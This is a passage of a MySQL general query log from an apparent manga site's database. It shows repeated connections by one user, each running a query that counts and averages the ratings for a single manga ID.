FROM ratings where manga_id = '201' order by created desc 330652708 Quit 330652709 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652709 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '120' order by created desc 330652709 Quit 330652710 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652710 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '10' order by created desc 330652710 Quit 330652711 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652711 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '2' order by created desc 330652711 Quit 330652712 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652712 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '198' order by created desc 330652712 Quit 330652713 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652713 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '16' order by created desc 330652713 Quit 330652714 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652714 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '261' order by created desc 330652714 Quit 330652715 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652715 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '203' order by created desc 330652715 Quit 330652716 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652716 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '338' order by created desc 330652716 Quit 330652717 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652717 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '271' order by created desc 330652717 Quit 330652718 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652718 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '237' order by created desc 330652718 Quit 330652719 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652719 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '224' order by created desc 330652719 Quit 330652720 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652720 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '53' order by created desc 330652720 Quit 330652721 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652721 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '231' order by created desc 330652721 Quit 330652722 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652722 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '100' order by created desc 330652722 Quit 330652723 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652723 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '293' order by created desc 330652723 Quit 330652724 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652724 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '107' order by created desc 330652724 Quit 330652725 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652725 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '241' order by created desc 330652725 Quit 330652726 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652726 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '312' order by created desc 330652726 Quit 330652727 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652727 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '181' order by created desc 330652727 Quit 330652728 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652728 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '126' order by created desc 330652728 Quit 330652729 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652729 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '20' order by created desc 330652729 Quit 330652730 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652730 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '234' order by created desc 330652730 Quit 330652731 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652731 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '18' order by created desc 330652731 Quit 330652732 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652732 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '122' order by created desc 330652732 Quit 330652733 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652733 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '190' order by created desc 330652733 Quit 330652734 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652734 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '227' order by created desc 330652734 Quit 330652735 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652735 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '284' order by created desc 330652735 Quit 330652736 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652736 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '322' order by created desc 330652736 Quit 330652737 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652737 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '123' order by created desc 330652737 Quit 330652738 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652738 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '196' order by created desc 330652738 Quit 330652739 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652739 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '308' order by created desc 330652739 Quit 330652740 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652740 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '266' order by created desc 330652740 Quit 330652741 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652741 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '226' order by created desc 330652741 Quit 330652742 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652742 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '11' order by created desc 330652742 Quit 330652743 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652743 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '219' order by created desc 330652743 Quit 330652744 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652744 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '72' order by created desc 330652744 Quit 330652745 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652745 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '292' order by created desc 330652745 Quit 330652746 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652746 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '221' order by created desc 330652746 Quit 330652747 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652747 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '174' order by created desc 330652747 Quit 330652748 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652748 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '209' order by created desc 330652748 Quit 330652749 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652749 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '222' order by created desc 330652749 Quit 330652750 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652750 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '251' order by created desc 330652750 Quit 330652751 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652751 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '194' order by created desc 330652751 Quit 330652752 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652752 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '327' order by created desc 330652752 Quit 330652753 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652753 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '119' order by created desc 330652753 Quit 330652754 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652754 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '298' order by created desc 330652754 Quit 330652755 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652755 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '65' order by created desc 330652755 Quit 330652756 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652756 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '200' order by created desc 330652756 Quit 330652757 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652757 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '187' order by created desc 330652757 Quit 330652758 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652758 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '185' order by created desc 330652758 Quit 330652759 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652759 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '311' order by created desc 330652759 Quit 330652760 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652760 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '184' order by created desc 330652760 Quit 330652761 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652761 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '235' order by created desc 330652761 Quit 330652762 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652762 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '242' order by created desc 330652762 Quit 330652763 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652763 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '331' order by created desc 330652763 Quit 330652764 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652764 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '211' order by created desc 330652764 Quit 330652765 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652765 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '176' order by created desc 330652765 Quit 330652766 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652766 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '321' order by created desc 330652766 Quit 330652767 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652767 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '339' order by created desc 330652767 Quit 330652768 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652768 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '183' order by created desc 330652768 Quit 330652769 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652769 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '220' order by created desc 330652769 Quit 330652770 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652770 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '249' order by created desc 330652770 Quit 330652771 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652771 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '246' order by created desc 330652771 Quit 330652772 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652772 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '215' order by created desc 330652772 Quit 330652773 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652773 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '275' order by created desc 330652773 Quit 330652774 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652774 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '287' order by created desc 330652774 Quit 330652775 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652775 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '195' order by created desc 330652775 Quit 330652776 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652776 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '212' order by created desc 330652776 Quit 330652777 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652777 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '280' order by created desc 330652777 Quit 330652778 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652778 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '278' order by created desc 330652778 Quit 330652779 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652779 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '330' order by created desc 330652779 Quit 330652780 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652780 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '229' order by created desc 330652780 Quit 330652781 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652781 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '186' order by created desc 330652781 Quit 330652782 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652782 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '326' order by created desc 330652782 Quit 330652783 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652783 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '256' order by created desc 330652783 Quit 330652784 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652784 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '270' order by created desc 330652784 Quit 330652785 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652785 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '114' order by created desc 330652785 Quit 330652786 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652786 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '294' order by created desc 330652786 Quit 330652787 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652787 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '276' order by created desc 330652787 Quit 330652788 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652788 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '320' order by created desc 330652788 Quit 330652789 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652789 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '250' order by created desc 330652789 Quit 330652790 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652790 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '216' order by created desc 330652790 Quit 330652791 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652791 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '277' order by created desc 330652791 Quit 330652792 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652792 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '236' order by created desc 330652792 Quit 330652793 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652793 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '358' order by created desc 330652793 Quit 330652794 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652794 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '188' order by created desc 330652794 Quit 330652795 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652795 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '272' order by created desc 330652795 Quit 330652796 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652796 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '118' order by created desc 330652796 Quit 330652797 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652797 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '262' order by created desc 330652797 Quit 330652798 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652798 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '28' order by created desc 330652798 Quit 330652799 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652799 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '371' order by created desc 330652799 Quit 330652800 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652800 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '281' order by created desc 330652800 Quit 330652801 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652801 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '254' order by created desc 330652801 Quit 330652802 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652802 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '323' order by created desc 330652802 Quit 330652803 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652803 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '328' order by created desc 330652803 Quit 330652804 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652804 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '361' order by created desc 330652804 Quit 330652805 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652805 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '238' order by created desc 330652805 Quit 330652806 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652806 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '347' order by created desc 330652806 Quit 330652807 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652807 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '286' order by created desc 330652807 Quit 330652808 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652808 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '255' order by created desc 330652808 Quit 330652809 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652809 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '372' order by created desc 330652809 Quit 330652810 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652810 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '315' order by created desc 330652810 Quit 330652811 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652811 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '189' order by created desc 330652811 Quit 330652812 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652812 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '313' order by created desc 330652812 Quit 330652813 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652813 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '325' order by created desc 330652813 Quit 330652814 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652814 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '260' order by created desc 330652814 Quit 330652815 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652815 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '348' order by created desc 330652815 Quit 330652816 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652816 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '285' order by created desc 330652816 Quit 330652817 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652817 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '319' order by created desc 330652817 Quit 330652818 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652818 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '306' order by created desc 330652818 Quit 330652819 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652819 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '283' order by created desc 330652819 Quit 330652820 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652820 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '355' order by created desc 330652820 Quit 330652821 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652821 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '342' order by created desc 330652821 Quit 330652822 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652822 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '264' order by created desc 330652822 Quit 330652823 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652823 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '302' order by created desc 330652823 Quit 330652824 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652824 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '182' order by created desc 330652824 Quit 330652825 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652825 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '274' order by created desc 330652825 Quit 330652826 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652826 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '329' order by created desc 330652826 Quit 330652827 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652827 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '279' order by created desc 330652827 Quit 330652828 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652828 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '314' order by created desc 330652828 Quit 330652829 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652829 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '332' order by created desc 330652829 Quit 330652830 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652830 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '351' order by created desc 330652830 Quit 330652831 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652831 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '289' order by created desc 330652831 Quit 330652832 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652832 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '343' order by created desc 330652832 Quit 330652833 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652833 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '310' order by created desc 330652833 Quit 330652834 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652834 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '356' order by created desc 330652834 Quit 330652835 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652835 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '301' order by created desc 330652835 Quit 330652836 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652836 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '273' order by created desc 330652836 Quit 330652837 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652837 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '300' order by created desc 330652837 Quit 330652838 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652838 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '263' order by created desc 330652838 Quit 330652839 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652839 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '318' order by created desc 330652839 Quit 330652840 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652840 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '317' order by created desc 330652840 Quit 330652841 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652841 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '382' order by created desc 330652841 Quit 330652842 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652842 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '295' order by created desc 330652842 Quit 330652843 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652843 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '373' order by created desc 330652843 Quit 330652844 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652844 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '245' order by created desc 330652844 Quit 330652845 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652845 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '247' order by created desc 330652845 Quit 330652846 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652846 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '337' order by created desc 330652846 Quit 330652847 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652847 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '299' order by created desc 330652847 Quit 330652848 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652848 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '335' order by created desc 330652848 Quit 330652849 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652849 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '90' order by created desc 330652849 Quit 330652850 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652850 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '265' order by created desc 330652850 Quit 330652851 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652851 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '258' order by created desc 330652851 Quit 330652852 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652852 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '380' order by created desc 330652852 Quit 330652853 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652853 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '334' order by created desc 330652853 Quit 330652854 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652854 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '336' order by created desc 330652854 Quit 330652855 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652855 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '304' order by created desc 330652855 Quit 330652856 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652856 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '297' order by created desc 330652856 Quit 330652857 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652857 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '340' order by created desc 330652857 Quit 330652858 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652858 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '341' order by created desc 330652858 Quit 330652859 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652859 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '374' order by created desc 330652859 Quit 330652860 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652860 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '367' order by created desc 330652860 Quit 330652861 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652861 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM 